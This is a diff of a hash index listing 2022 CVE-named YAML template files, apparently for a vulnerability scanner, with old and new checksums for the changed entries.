+http/cves/2022/CVE-2022-2756.yaml:db8ccaa8e864d9924b662e7006fe49300b265fdc +http/cves/2022/CVE-2022-27593.yaml:3b7e59dc07b9e0911b6e03fde336484a1c5a6d9c http/cves/2022/CVE-2022-27849.yaml:97aa8073fe3a8568903eb3a71c29bd8d85b791eb -http/cves/2022/CVE-2022-27926.yaml:da7ae007929c2fb6856021e4bf4340e8af1d7a89 +http/cves/2022/CVE-2022-27926.yaml:4a2d6e2cb19a8e1c5a7c679b95b5ddd9636c0940 http/cves/2022/CVE-2022-27927.yaml:633fdddad64db028886739bc32f962098d0ec796 http/cves/2022/CVE-2022-27984.yaml:46e0d68cbbfb63e9808acf7d5f85ba8012a2a2be http/cves/2022/CVE-2022-27985.yaml:7de01fef2fe8a799a34cbfa788042f1cbc888287 http/cves/2022/CVE-2022-28022.yaml:d9e2638306589873983b03d584708ab315752bd1 -http/cves/2022/CVE-2022-28023.yaml:4979f35397633f09f8b74e1ff16957ef31c2dc83 -http/cves/2022/CVE-2022-28032.yaml:7b2fca1b361b1d628558315b12f974b9bd10a422 -http/cves/2022/CVE-2022-28079.yaml:2e45d03d5e4ecc0776b8cdd2c78e6930b9025734 -http/cves/2022/CVE-2022-28080.yaml:76bfcd361fc9f5c5df2142c84b04f711c74cb4e9 -http/cves/2022/CVE-2022-28117.yaml:fd1a36a34116d91ca9b14c4ac8921b433379ad97 -http/cves/2022/CVE-2022-28219.yaml:8202b2c8306ae87dcd1e06acb54ad77150eaa55b +http/cves/2022/CVE-2022-28023.yaml:5f9b4c0a096aade433c641f9742fe941b1926a1f +http/cves/2022/CVE-2022-28032.yaml:ccb20f87bc6749ecd44f76b965233728b440aafc +http/cves/2022/CVE-2022-28079.yaml:94a540cee17e3e49ec31c9e828d5ea1c5bdce435 +http/cves/2022/CVE-2022-28080.yaml:b0b5afd63a37bec422bfff70a98268b8c051c55c +http/cves/2022/CVE-2022-28117.yaml:8db307831c5623c38b79ce199be4310355ea9fb1 +http/cves/2022/CVE-2022-28219.yaml:f878efea55d577100913da6c0df9cf4fbd7d7a9b http/cves/2022/CVE-2022-28290.yaml:8440960ace63416405bd7a7b189f116f279c0484 -http/cves/2022/CVE-2022-28363.yaml:cc9685220579da5c2a9a8867995ba074cb4233a1 -http/cves/2022/CVE-2022-28365.yaml:4e72efa464c36f725336a7c324c1a64dbff39583 -http/cves/2022/CVE-2022-2863.yaml:b7c3f6a3dfefea2e16da9f2316ff124718d8a7cd +http/cves/2022/CVE-2022-28363.yaml:8b2bb177d3a6950e5a7aaf4dc3c693299a951b7f +http/cves/2022/CVE-2022-28365.yaml:fcf3187688d21b77d28782aff7b2cff36a5b064b +http/cves/2022/CVE-2022-2863.yaml:139e3e14ba32fbce63cd58f9ecdfb55aef7c7556 http/cves/2022/CVE-2022-28923.yaml:6f9bba6c52e322bef8684d5b700503bc747d8ca1 -http/cves/2022/CVE-2022-28955.yaml:1d47804e894ccd8a9761ee84225ed765758bd3ac -http/cves/2022/CVE-2022-29004.yaml:2d70f0deb661fcd8378f0defe94b5b8ff3d1b2bc -http/cves/2022/CVE-2022-29005.yaml:ba2650306136be7e839e60a17017bdef19778395 -http/cves/2022/CVE-2022-29006.yaml:3f92cc94c558aeca1f7663a6ca6326cbb3fd916a -http/cves/2022/CVE-2022-29007.yaml:ce0ebbc203785c132346d45bbc9fb9cba385a695 -http/cves/2022/CVE-2022-29009.yaml:a8125fe7fab4768c0ff0141df382a51be6ab5b7b -http/cves/2022/CVE-2022-29013.yaml:f870df8d5e98a8c2010736c7360b9d4bd34926df -http/cves/2022/CVE-2022-29014.yaml:eb89b3104590a4160926c3bf3aa6d56bfc8ecdb6 -http/cves/2022/CVE-2022-29078.yaml:78da9911e25b0d3be3ed629ecf6048f20b9eeb6a -http/cves/2022/CVE-2022-29153.yaml:d6aaaa8ba76fae69b21ffc3b5ffdb2099a71e7e4 -http/cves/2022/CVE-2022-29272.yaml:e46629c0d32306c928c18e548ae6873dcc8bda84 -http/cves/2022/CVE-2022-29298.yaml:c3c3ae5a5c5ce9e831076128b0a459bca3734e6d +http/cves/2022/CVE-2022-28955.yaml:9e612f793a8dcfd2d978d0e38d2a38439ad554f3 +http/cves/2022/CVE-2022-29004.yaml:f17874946822a87c945a95d66ce3bd8130aedba9 +http/cves/2022/CVE-2022-29005.yaml:2f778fffde11c62061dd7818fbae94aa0e3b44f3 +http/cves/2022/CVE-2022-29006.yaml:b268213d79842b66f50476a81610d504e9df9a03 +http/cves/2022/CVE-2022-29007.yaml:ca25780695784f87d5876d40a2c4b082841d77ed +http/cves/2022/CVE-2022-29009.yaml:5b59e01a1574bdcf05aee421722002bfeedc1eaf +http/cves/2022/CVE-2022-29013.yaml:aa822f0d3d9c552b38ee8e0d6f24416d6fc52cca +http/cves/2022/CVE-2022-29014.yaml:d7fe9eba13214850635cedd9df08b509ed93f30c +http/cves/2022/CVE-2022-29078.yaml:0d9401a7ca4b569db1fa80884acc0201e4534493 +http/cves/2022/CVE-2022-29153.yaml:1682c513fbfe66bf29ed25596663bf7050d24cdf +http/cves/2022/CVE-2022-29272.yaml:135253934e0ac9a6eb4e472c2a9360fa84ad5422 +http/cves/2022/CVE-2022-29298.yaml:b09b8c47f120e3400bc6f05474e2a74c01bf5041 http/cves/2022/CVE-2022-29299.yaml:4ca43f289ba13eddc097bd4e67738ff9b859e918 http/cves/2022/CVE-2022-29301.yaml:00fdd854b16529833bddf7e7a6d5271787eb2868 -http/cves/2022/CVE-2022-29303.yaml:e412d5c1d4d856a6614d721c0b020e98ae67a1ba -http/cves/2022/CVE-2022-29349.yaml:ca126ee4edf1a4ab39deb754320e725d31ccd872 +http/cves/2022/CVE-2022-29303.yaml:b20321eee1000fa73ee32f14dfacfde0c70dc6e6 +http/cves/2022/CVE-2022-29349.yaml:d030a4a3f983c0041631ebfa3389499a1bf8e936 http/cves/2022/CVE-2022-29383.yaml:1f1a67523a657132055661ca16b0d5671ea8681c http/cves/2022/CVE-2022-29455.yaml:929c2512832cab6541789b6b561df0d8477498f8 -http/cves/2022/CVE-2022-29464.yaml:bf87e27647d1ebbf877cfd7143b65cd660fb137c -http/cves/2022/CVE-2022-29548.yaml:cbc6fc977f78500ad9b187fd7b2380ec71249853 -http/cves/2022/CVE-2022-29775.yaml:60ab880ce620e2434f39655520846122ac0bfc1e -http/cves/2022/CVE-2022-30073.yaml:883ed694eb477c29321c25a784a8b8bd0e4c7bd9 -http/cves/2022/CVE-2022-30489.yaml:48cac2049ddc762c7305b763ca51b0c41caa1df1 -http/cves/2022/CVE-2022-30512.yaml:481ad8dc366af6b04bd8a7ee28b2fcd3cabb8236 -http/cves/2022/CVE-2022-30513.yaml:12ec0a38286f02f3cb0f6987b434b77f65c230b4 +http/cves/2022/CVE-2022-29464.yaml:f8d21f5853ad6bdd504ca36d9ab62f11e5b13197 +http/cves/2022/CVE-2022-29548.yaml:e5b6db18d153249c400ed8934f7fd6e267e86d2c +http/cves/2022/CVE-2022-29775.yaml:29e7eb3f2a8184c6620192ffc1e50a4424eb23eb +http/cves/2022/CVE-2022-30073.yaml:25c2c48bff67d81f85a53d466f20fc59708f5de8 +http/cves/2022/CVE-2022-30489.yaml:0c264666d83b4532314d19d0e47dc0e6892b411b +http/cves/2022/CVE-2022-30512.yaml:638d83b05fc1d498deb992b8d6009fc381ab4e09 +http/cves/2022/CVE-2022-30513.yaml:5055c09b0c1d4e099eb82a75362336552b084bd5 http/cves/2022/CVE-2022-30514.yaml:a7a01641fab1a8401851ea7d602d12f2893d4adb -http/cves/2022/CVE-2022-30525.yaml:4d90b29ba8aae34ecb895dde2c2ca49a61f459ac -http/cves/2022/CVE-2022-3062.yaml:800bb8903716586e3844dc3be9a59571bd9ff402 -http/cves/2022/CVE-2022-30776.yaml:b76e1c92439e4548bff7f721e74c7a5fc4366213 -http/cves/2022/CVE-2022-30777.yaml:b6209175e96f33fe9c6aa9fbdf1b7b9a81158a39 -http/cves/2022/CVE-2022-31126.yaml:82fb9dced01e613af573ba72cfb75c7c883d225c -http/cves/2022/CVE-2022-31268.yaml:928ccaa669be7c767bc5d9e4cecc405b762c9d33 -http/cves/2022/CVE-2022-31269.yaml:17a274515295763d5047717c64a574d4de127383 +http/cves/2022/CVE-2022-30525.yaml:d7027f75120cc5b444ed3e1651ad0575c2acc387 +http/cves/2022/CVE-2022-3062.yaml:fcda96c1f8a7c5adddaf9cb68e11a534813d3988 +http/cves/2022/CVE-2022-30776.yaml:7b65fdf9e68afbaf57abac30011559ab04cc36e4 +http/cves/2022/CVE-2022-30777.yaml:348575680463fdc998e2e0659b8b0fcd13f159cc +http/cves/2022/CVE-2022-31126.yaml:8765e3683cf4e3edb74558ab9aadde636c29e39a +http/cves/2022/CVE-2022-31268.yaml:3d2584bf8973ee4aed9ca92cca9bd1292f5ce4d0 +http/cves/2022/CVE-2022-31269.yaml:ea33bea515a45709878ac112c119073f59486a92 http/cves/2022/CVE-2022-31299.yaml:83e0fce7d1de1b228595ffa36be5d64ee8aef870 -http/cves/2022/CVE-2022-31373.yaml:b1dd8fa5fc5a7cc6a07835579c77f189cb688821 -http/cves/2022/CVE-2022-3142.yaml:0ab319adad78001466f99b3ea8a3b75e4149690a +http/cves/2022/CVE-2022-31373.yaml:b9e053ea83ba33e14693634c4cfe55c070001362 +http/cves/2022/CVE-2022-3142.yaml:2a6426c6d467c1f071a049cef27121b04587006d http/cves/2022/CVE-2022-31474.yaml:ea47cd03d542d4c58da04a90b5803dfd9f2997e2 -http/cves/2022/CVE-2022-31499.yaml:a4b7c73f255b3b79c794032321267bb88ae7b8d3 -http/cves/2022/CVE-2022-31656.yaml:6092c3e1effe45859ebe139b808edeaf5f7c120d -http/cves/2022/CVE-2022-31798.yaml:d8ec34db1e298169e27be0989bad5b333cf7e90f -http/cves/2022/CVE-2022-31814.yaml:994f7827151acd9db7ba7b1f814f644dc9248b6a -http/cves/2022/CVE-2022-31845.yaml:f50420c8f1f3eaf701131aeb526f37483126a1da -http/cves/2022/CVE-2022-31846.yaml:8df31bc5751cf2f3f9c4a39926e6e87c0a38bb55 -http/cves/2022/CVE-2022-31847.yaml:80e49fd56d810e107410e0f04348ab99aa413f17 -http/cves/2022/CVE-2022-31854.yaml:0d92e3c266fba0ccc538150c6c8c6b0c5eecb3df -http/cves/2022/CVE-2022-31879.yaml:ecf1c40795f31704bde59f6465e18f9359a01f15 +http/cves/2022/CVE-2022-31499.yaml:fea6c2992c60facd58882a5bd00fdc7cfa4a8b71 +http/cves/2022/CVE-2022-31656.yaml:2ec2d438d899ce2c590154b97dc5335a374cb623 +http/cves/2022/CVE-2022-31798.yaml:d78c8b0c6de1e51015b04c40916085df465ac60f +http/cves/2022/CVE-2022-31814.yaml:118097ce6da0a7e663d4890d0e8b786af80c65fe +http/cves/2022/CVE-2022-31845.yaml:05750ad436a36e26ad2d5c70e229048d8c0dfbc7 +http/cves/2022/CVE-2022-31846.yaml:88e064ac22f6fa785243e8126be0048d2efe9e4a +http/cves/2022/CVE-2022-31847.yaml:127e72d5b4c2ed317cc1a0de14c81640c4c2f6a2 +http/cves/2022/CVE-2022-31854.yaml:365c4ced58a37e3d0f041bab452270ada3fc3a3a +http/cves/2022/CVE-2022-31879.yaml:cf56507b017fd380640d0260a4b002f977f727f7 http/cves/2022/CVE-2022-31974.yaml:6711ff86f730445184c93c2a91a32daf2af56723 http/cves/2022/CVE-2022-31975.yaml:1d80466a8bfedc02bacb9b870793a036d0769a40 -http/cves/2022/CVE-2022-31976.yaml:af47305c69b62a3707544b8824d73730f1feea28 -http/cves/2022/CVE-2022-31977.yaml:fb933c37a9088114120622f44fbde494ad76b685 +http/cves/2022/CVE-2022-31976.yaml:e6c75f79cbfb04defaea59a859cfbda40ba39dc4 +http/cves/2022/CVE-2022-31977.yaml:b04acc6c53b519736e32ef4d124affae024160eb http/cves/2022/CVE-2022-31978.yaml:d082ccb6e5136465a070be3119ace6a2d590bf98 http/cves/2022/CVE-2022-31980.yaml:a4baa163ee8e01c4dca72b3481a50bed0a800a2e -http/cves/2022/CVE-2022-31981.yaml:53292d344e663430fd29d41862a751fcf84dc93e +http/cves/2022/CVE-2022-31981.yaml:97e53c47baf8d12fc36f09c2c67028340f1d9000 http/cves/2022/CVE-2022-31982.yaml:14887472d5e8ef45ff5a9e2985f9ce447fc482d2 -http/cves/2022/CVE-2022-31983.yaml:bd550f93be35f780d96d33f4366e0dbd971fa5e0 -http/cves/2022/CVE-2022-31984.yaml:164dd112395242226934dd94a642fcb5fea821d9 +http/cves/2022/CVE-2022-31983.yaml:0cc27ef5ed78ddc7970cd851b3bf3d88babf4aff +http/cves/2022/CVE-2022-31984.yaml:b6dabf331f1f42e3dfb65cf34469dabc48c5cdb5 http/cves/2022/CVE-2022-32007.yaml:e906645b18647cd54049b516c600dcb45757027f -http/cves/2022/CVE-2022-32015.yaml:ec2c1708fead606aa390b8c35c46a34ddc777eb5 -http/cves/2022/CVE-2022-32018.yaml:551975f5da6db94b170725d3686f39c4bc435fde -http/cves/2022/CVE-2022-32022.yaml:9586471a0368ac819bd583931c949b09d48d24a8 -http/cves/2022/CVE-2022-32024.yaml:207ce401aa5f7dc8ed56a60db62c6394e8619d25 -http/cves/2022/CVE-2022-32025.yaml:d1081e873521f01221f98a0390cd1941f35ad5f4 -http/cves/2022/CVE-2022-32026.yaml:fd956f8e58bd3c74a0b638582e3379a0164b645b -http/cves/2022/CVE-2022-32028.yaml:ba2257a785f2c984a7435a10b66e0faa6e9ee7cb -http/cves/2022/CVE-2022-32094.yaml:ba8d397ce2a250f61448842736a9ae8df1245f4b -http/cves/2022/CVE-2022-32195.yaml:b385b13ea98fcfd02610cc4190a83c890976589d -http/cves/2022/CVE-2022-32409.yaml:cdaa40ef5296aa273cff3e52b2223e915ccc91c9 -http/cves/2022/CVE-2022-3242.yaml:55e5d08f68dbc419510b54333506ca5ed690ab6f -http/cves/2022/CVE-2022-32429.yaml:d1e64c39847e71ace80f87533f8efe0135418653 -http/cves/2022/CVE-2022-32430.yaml:19d2b8e3425cd8ecd0fe3ea4ac8fd65bd1994b8f -http/cves/2022/CVE-2022-32444.yaml:d3547e337eca62e0ee2d06483b6afcfad9bb57c1 -http/cves/2022/CVE-2022-32770.yaml:35826cc7fe5e9f172929bc10724a945a4538a8cd -http/cves/2022/CVE-2022-32771.yaml:7ce55fda19ca98acb61f2ad07fedc9ff156bb348 -http/cves/2022/CVE-2022-32772.yaml:3de244b98d52162e49284deea5f30b2420d67424 -http/cves/2022/CVE-2022-33119.yaml:16e23a190bad201697dd8aa0410174defb4eff60 -http/cves/2022/CVE-2022-33174.yaml:9a29967c97f24a1af05aa9868e1daf084c0c5ba5 -http/cves/2022/CVE-2022-33891.yaml:05e8f177e1c72009cd49d11afa11e61261035c79 -http/cves/2022/CVE-2022-33901.yaml:bbd8ecc8d9150023534d5092980f2c18173e5f27 -http/cves/2022/CVE-2022-33965.yaml:92e795d1852ccb1de9b4f5c935e97132b0156229 -http/cves/2022/CVE-2022-34045.yaml:04b032425379bdc77d5deedce61cb32b4edc721f -http/cves/2022/CVE-2022-34046.yaml:5afcfdfca99bf861c7f28898d146887be8c9959d -http/cves/2022/CVE-2022-34047.yaml:2729826a4e3aa2adcbc4483c40848e0b8d2aaafd -http/cves/2022/CVE-2022-34048.yaml:d9558fb81dcbc712ed12a59d6673e1d97a5f86b6 -http/cves/2022/CVE-2022-34049.yaml:414cc417dbea463e70b94ea52e8c8fe8f1ae9fcc -http/cves/2022/CVE-2022-34093.yaml:db9dfda36eebbd289437eb9334f6c2a943d35fb6 -http/cves/2022/CVE-2022-34094.yaml:970e54a6a41e8d46c4887549f9e16230b4619157 -http/cves/2022/CVE-2022-34121.yaml:2787d6c8b42395e83efd3f3c217617364a211403 -http/cves/2022/CVE-2022-34328.yaml:acb0ddabe1710a8a603747da1992d51fc8d00343 +http/cves/2022/CVE-2022-32015.yaml:dfa56cfa49faf125c0eb6a8658b2e4edb2dce48e +http/cves/2022/CVE-2022-32018.yaml:8bce734f6dd5d9598eb3e5e11810b016ad428347 +http/cves/2022/CVE-2022-32022.yaml:a031d3cb8d2d8cc99cefbb08a80cfd015c627c33 +http/cves/2022/CVE-2022-32024.yaml:e3e0e231ba829dc5185d8c7a8d0b41f444d49b46 +http/cves/2022/CVE-2022-32025.yaml:82eac853b181656a81461f6a3088d4da9b21315d +http/cves/2022/CVE-2022-32026.yaml:693daca2d53bd225e13019c0ec2abda2d34de6d4 +http/cves/2022/CVE-2022-32028.yaml:ad5c53418cf7d48f5a52d53adb3811360f1776e8 +http/cves/2022/CVE-2022-32094.yaml:b0e6265a47e34fe8a426659b196f8198223c4c9b +http/cves/2022/CVE-2022-32195.yaml:3a4a7198d701496901e49b12a55a38428dd76a5d +http/cves/2022/CVE-2022-32409.yaml:295d70cb0faaddb5f74f6ce9681439616f8c0dc6 +http/cves/2022/CVE-2022-3242.yaml:d94ae09300d904e2270df92e536e2a7c2f1d7c64 +http/cves/2022/CVE-2022-32429.yaml:59de8ad5ce3fd0c50c5bf65b45ba3d09922c29cb +http/cves/2022/CVE-2022-32430.yaml:a50c709568c6677e3d7d8a2f4ebac862e239611e +http/cves/2022/CVE-2022-32444.yaml:90993fc37397f25237a76f27bd790afb3a51e06b +http/cves/2022/CVE-2022-32770.yaml:f6866809f6f32c3f4fbeb7beb47bd8da19310d36 +http/cves/2022/CVE-2022-32771.yaml:e004b0b5ecf15a362b2aae3224adf4c744e597e4 +http/cves/2022/CVE-2022-32772.yaml:821224ad794b60964dfcb9144c7060aefa893b39 +http/cves/2022/CVE-2022-33119.yaml:4bb15baae641ad268dfbf798d2d2fd3002d16a43 +http/cves/2022/CVE-2022-33174.yaml:39085eea5c4723c6e93bd4d2a446fdaf737080b6 +http/cves/2022/CVE-2022-33891.yaml:a8df29e6e02b7ee1f594d1ed1e6a305f96aca22e +http/cves/2022/CVE-2022-33901.yaml:fa27ea080559ed96840da6b82a590142f01096ec +http/cves/2022/CVE-2022-33965.yaml:c7fb0a79d5597637f9c4bbbd4151d1c84c407f25 +http/cves/2022/CVE-2022-34045.yaml:8e7476b0fd7d68e2aff3d4b06042096b272093cf +http/cves/2022/CVE-2022-34046.yaml:e9e334fdb6bb75c99f09277a0c641d8b572bb318 +http/cves/2022/CVE-2022-34047.yaml:9e7178c8b1e7d8938e2d49255e982c0b493592f3 +http/cves/2022/CVE-2022-34048.yaml:41dcebec250c36a91fc9f5167b3c6cabb896db36 +http/cves/2022/CVE-2022-34049.yaml:9883f6e4fbc075b4ca46a36e2819f4b7193cbdbb +http/cves/2022/CVE-2022-34093.yaml:507d9374130389cd1aec5b58c6adb274020e93c7 +http/cves/2022/CVE-2022-34094.yaml:532360cc425c43471f60b0c3a4668b2b416ba392 +http/cves/2022/CVE-2022-34121.yaml:dbea363aeb740fe3e7119e4e1fdb4a7c39c07d28 +http/cves/2022/CVE-2022-34328.yaml:a5d85d3ab567ff7a3e9655bd9d6b44e092cef3cd http/cves/2022/CVE-2022-34534.yaml:9ffb8d48988fbf1da5a24e59db586356c05d2c9b -http/cves/2022/CVE-2022-34576.yaml:1798a725c81fdcdc7857b1dfa8bb3e50af7967aa -http/cves/2022/CVE-2022-34590.yaml:dda3291a4b9c79114c37ff3f316f752e34591f27 -http/cves/2022/CVE-2022-34753.yaml:afee835f00cc1df39ed9964d00d627c4d1b0f58b +http/cves/2022/CVE-2022-34576.yaml:db01443ddd5a7c1b440322296c27ac967ec933df +http/cves/2022/CVE-2022-34590.yaml:7a0875c8654b9a36c7413f9bf3ad346b61a54768 +http/cves/2022/CVE-2022-34753.yaml:cf011c53e92f1275ab9d2c1c85b785a390fb2818 http/cves/2022/CVE-2022-3484.yaml:9b14f907cb7136b5784b38fcad2ea5ad3616ad6b http/cves/2022/CVE-2022-3506.yaml:c968d447575bfbedfda9e2f946c6dc742a462ee6 -http/cves/2022/CVE-2022-35151.yaml:ebd86d38e9053470f7556e9153e6d4ac3c490123 -http/cves/2022/CVE-2022-35405.yaml:d2f8ef14ef62861d225e570ab5bb459ef15d7d6c -http/cves/2022/CVE-2022-35413.yaml:5f5b49f4f34a01110902e54518444fc96a1deb09 -http/cves/2022/CVE-2022-35416.yaml:31d6d56c3d52ebd3fbd47a749fd7631a493948f6 -http/cves/2022/CVE-2022-35493.yaml:975b5ddf394023dd578a236a3ec085090fd2fb27 -http/cves/2022/CVE-2022-35653.yaml:65a1a5db8ef3b85e3ba1a29c18e2e2a4cf2ac30a -http/cves/2022/CVE-2022-3578.yaml:196b7f4717e5f7c7d8ea990d8e77b06e8c32fbbf -http/cves/2022/CVE-2022-35914.yaml:e697c17b89eb47f678cb132049aafeee165dcf40 -http/cves/2022/CVE-2022-36446.yaml:b128acedc5aeab4bf73646340183b230b8cb050e -http/cves/2022/CVE-2022-36537.yaml:7c3fd9dc6e86f9de1f597060f394354e974cfaf5 -http/cves/2022/CVE-2022-36553.yaml:14aaf8d87043c2140a8b8b40714c95647f28fc61 -http/cves/2022/CVE-2022-36642.yaml:8876b041f019a89ae3bca2c7d2844ea11516e94a -http/cves/2022/CVE-2022-36804.yaml:48768b4ff9ab543c51a1e21bf4cba75e81f2177a +http/cves/2022/CVE-2022-35151.yaml:887e860fc56183fc61067c95044b5e7055923da8 +http/cves/2022/CVE-2022-35405.yaml:531fd8bf67592d3550a1864d87077aa2ad8fc4ba +http/cves/2022/CVE-2022-35413.yaml:501c7edd88e20ff8a06e984985bdf7f9c6f9c563 +http/cves/2022/CVE-2022-35416.yaml:ba270b48da401279206d5f902bbe73ca36541510 +http/cves/2022/CVE-2022-35493.yaml:59a026d68d4e4a47059411ae316a3f86e40b327e +http/cves/2022/CVE-2022-35653.yaml:1c2ca95a997adc6ad03fc86ab31180791c6ab73c +http/cves/2022/CVE-2022-3578.yaml:cf4906cde10fe488bbdf473de15bb5d018745939 +http/cves/2022/CVE-2022-35914.yaml:8c28134bca5d19eb6f662e8e531c4c947ff45566 +http/cves/2022/CVE-2022-36446.yaml:6e1d76fbfcebd3e106413ecf687578e9f8bde35c +http/cves/2022/CVE-2022-36537.yaml:16dd909076b3f680cb78079cf81b7ca85f53da70 +http/cves/2022/CVE-2022-36553.yaml:fcc3832cae8fb321679d07f7603451fa2788385f +http/cves/2022/CVE-2022-36642.yaml:49c37d9a02606258196ed9883fa3b9096c9b25dc +http/cves/2022/CVE-2022-36804.yaml:f5b29c0c01d220a9aa152ff0f0146ef72e129f53 http/cves/2022/CVE-2022-36883.yaml:b2a77fd8caa9f90f4c624d08e79da36785fb5887 http/cves/2022/CVE-2022-37042.yaml:791bb09d5a41f5aa2c4efe95fff894066aca3462 -http/cves/2022/CVE-2022-37153.yaml:dceb39b03d7b48df7d64eb4c49bb63bd364cdb86 -http/cves/2022/CVE-2022-37190.yaml:e9b680bb1d4fb90aba7c9beb4daaa03fa5acc67c +http/cves/2022/CVE-2022-37153.yaml:6b0c65ec090898e9e7bda7a1196d0b501c27964d +http/cves/2022/CVE-2022-37190.yaml:a299ef58e490ff88c6c34e29fc02f2de7c2f2ef2 http/cves/2022/CVE-2022-37191.yaml:a977ea067bf64e1d421824777088a50fd310eb2e -http/cves/2022/CVE-2022-37299.yaml:2bf98141108464e39939076964bc3f0b76a1d419 -http/cves/2022/CVE-2022-3768.yaml:ffd277014afbe590ee92b911ea18617d95a54b4a +http/cves/2022/CVE-2022-37299.yaml:0a3f30c80ce167733cb1a4432f2090d7d8715a62 +http/cves/2022/CVE-2022-3768.yaml:8c9f9736507f827359a08f4f70e83cfa05cd3e2a http/cves/2022/CVE-2022-3800.yaml:e0db40aab2e6f85e641c8544d490df6d1813bfb4 -http/cves/2022/CVE-2022-38131.yaml:16633791ba453690abbccc04bf2827d3e3b64fa8 +http/cves/2022/CVE-2022-38131.yaml:a2476b8544baebdef4439506564eaf03eca7884b http/cves/2022/CVE-2022-38295.yaml:5d2b719b844945457583a57848120fce85b5ddee http/cves/2022/CVE-2022-38296.yaml:ddedd4e313db9c5b34f247104057fd75cf21c627 -http/cves/2022/CVE-2022-38463.yaml:8a460761963d6452e325a6967929f735d9624c9b +http/cves/2022/CVE-2022-38463.yaml:37e1212dbe6b70efe91849adc5e90e4be74e3805 http/cves/2022/CVE-2022-38467.yaml:62f2d8f8084e77210d887d32f244205e1a886cb9 -http/cves/2022/CVE-2022-38553.yaml:99a61eaf9f0eef9526a19cfb3f9d81234b5a61ab -http/cves/2022/CVE-2022-38637.yaml:5229df6801603fbe9860fb4d08fb4702154a46ba -http/cves/2022/CVE-2022-38794.yaml:05d398a39b276d94ec05f9e2d2273726737e4835 -http/cves/2022/CVE-2022-38817.yaml:b8c33e77974977638c28a124b46baffb59e11f50 -http/cves/2022/CVE-2022-38870.yaml:0d586a3f9611fa4f761056be78defb8e43041a81 -http/cves/2022/CVE-2022-39048.yaml:484860f8b3c1457bcbec897dbf3e0480611c631a +http/cves/2022/CVE-2022-38553.yaml:ae779d7df75f2a7703ecec46e819829c4780c74b +http/cves/2022/CVE-2022-38637.yaml:b5ea9fe5fa60aced3abbfeb0e50c2fb33a3990d1 +http/cves/2022/CVE-2022-38794.yaml:d5a7bc3e97c053bc014490f0dc3b18ce3939ed76 +http/cves/2022/CVE-2022-38817.yaml:a615d76fcd6f59a22d54293bd19562985c487026 +http/cves/2022/CVE-2022-38870.yaml:d5e4359641ea70850fada0c1d9596efd31ff62b1 +http/cves/2022/CVE-2022-39048.yaml:a627a172e29e44bad133e80ab808ed890f26a19b http/cves/2022/CVE-2022-3908.yaml:7a24ebd5708610556552ab3053544addd76e9dc2 -http/cves/2022/CVE-2022-39195.yaml:5a6117d247d94ac07d2a01f761b7560e5beb434f +http/cves/2022/CVE-2022-39195.yaml:5badb0ee8d4fdda61ac34dcf50f40092827b780f http/cves/2022/CVE-2022-3933.yaml:8bdf9fc2cc672a6ceeadc95a0bb890ab17396398 http/cves/2022/CVE-2022-3934.yaml:e1abcd7b986d2f3622f65200fdc1412374c8f640 -http/cves/2022/CVE-2022-3980.yaml:be0932c302151a00f4a4e3aafc044131fa7041c9 -http/cves/2022/CVE-2022-3982.yaml:f1ae90ddebbe87cc6d2afa54dbbddce7a64d8a0f -http/cves/2022/CVE-2022-39952.yaml:5cad670355bc18db9021105888d1a4aaa41931d8 -http/cves/2022/CVE-2022-39960.yaml:8cb9de579b88d371eab64496c9d02d4100927ca5 -http/cves/2022/CVE-2022-39986.yaml:2ef3546836c760afbf47f417d561bdb2ef43774e -http/cves/2022/CVE-2022-40022.yaml:12859046bf14e5f3f21d178ce9015ad7a7ba31de -http/cves/2022/CVE-2022-40032.yaml:1396354a1b4e319824165d92bbdc696ae6d492d6 -http/cves/2022/CVE-2022-40047.yaml:1051ce40d38c12dcb11a88856d6aa09c2233438a -http/cves/2022/CVE-2022-40083.yaml:dab7a5d89ce9e24219132f7ea31024babc1adb7d -http/cves/2022/CVE-2022-40127.yaml:09dfedcc92379c248beda2e26c2cad770d0f3ca5 +http/cves/2022/CVE-2022-3980.yaml:2a7ecbba1ee977e8974dcc4872c6d7daa077985d +http/cves/2022/CVE-2022-3982.yaml:e8d1d3ef09716ea6385568e088d5bf7ff4c30d20 +http/cves/2022/CVE-2022-39952.yaml:886c42b5541d8bbb8bf8c5113d5c3fe1331be474 +http/cves/2022/CVE-2022-39960.yaml:0d2ff48c23b513f8c92bd8374b41807b1e548554 +http/cves/2022/CVE-2022-39986.yaml:92d7db86d01d2771b7880f9c440feb8e62b94de2 +http/cves/2022/CVE-2022-40022.yaml:64a838eb51b5a1c34c5b17e74f1fe233cbcc24ae +http/cves/2022/CVE-2022-40032.yaml:457b3c849fc450b8c4f39efc48b93f39e9a2c9ab +http/cves/2022/CVE-2022-40047.yaml:ae1d693bafef5fe46f998a3dca6021f16b8b7833 +http/cves/2022/CVE-2022-40083.yaml:333acecbc6c71ec844ded8fbdc5e2de95af9e34e +http/cves/2022/CVE-2022-40127.yaml:7629ce4bfdabd4f587efa6108c0bf0d3a6f90b6f http/cves/2022/CVE-2022-40359.yaml:ddd501f8d916d909938c17ccf6492dc2e2c7d812 -http/cves/2022/CVE-2022-4049.yaml:e6d552a5ceef081c8c1df71be4326ffd9c53b522 -http/cves/2022/CVE-2022-4050.yaml:fa6d88bc616e361834ebeb5c478ca05c83185ba0 -http/cves/2022/CVE-2022-4057.yaml:14f32b6b618af722f36d34536ba0f5d0272b936b -http/cves/2022/CVE-2022-4059.yaml:1fe820b76e6c8bc9ec2332d71a49eec82867be11 +http/cves/2022/CVE-2022-4049.yaml:69e08fcb933099640d793cff650f72473cdae4eb +http/cves/2022/CVE-2022-4050.yaml:054b17311703abba376a3fceb0279ec9e86bbb01 +http/cves/2022/CVE-2022-4057.yaml:10e0f9a0f2c81b1f8ba34fdd2fa479fcc3fa0577 +http/cves/2022/CVE-2022-4059.yaml:dfacf3331d559806f98130753a29fc6a863d4a60 http/cves/2022/CVE-2022-4060.yaml:4564f0fd4f8ed6221de40ce6673f81c2c9453e8c -http/cves/2022/CVE-2022-4063.yaml:3fb1ed5b51203915d8cfd84cb8db575e4d87e941 +http/cves/2022/CVE-2022-4063.yaml:4fc58e6992b32c1e2e2a0d1c78934dfb336aa6d5 http/cves/2022/CVE-2022-40684.yaml:9f201c8f2b14b43cff542ef33691c0622eabc992 -http/cves/2022/CVE-2022-40734.yaml:8a7781bc2daca562ad8c0731b6c6a17f2668b3b5 -http/cves/2022/CVE-2022-40843.yaml:ece5d4a184a394a8443bb4be181314ea0141e329 -http/cves/2022/CVE-2022-40879.yaml:6fcf7a32c558a8391534e5050bcdf7b2c23e34b6 -http/cves/2022/CVE-2022-40881.yaml:9424976184bfd9d0812861793aa2a9b7240d70b6 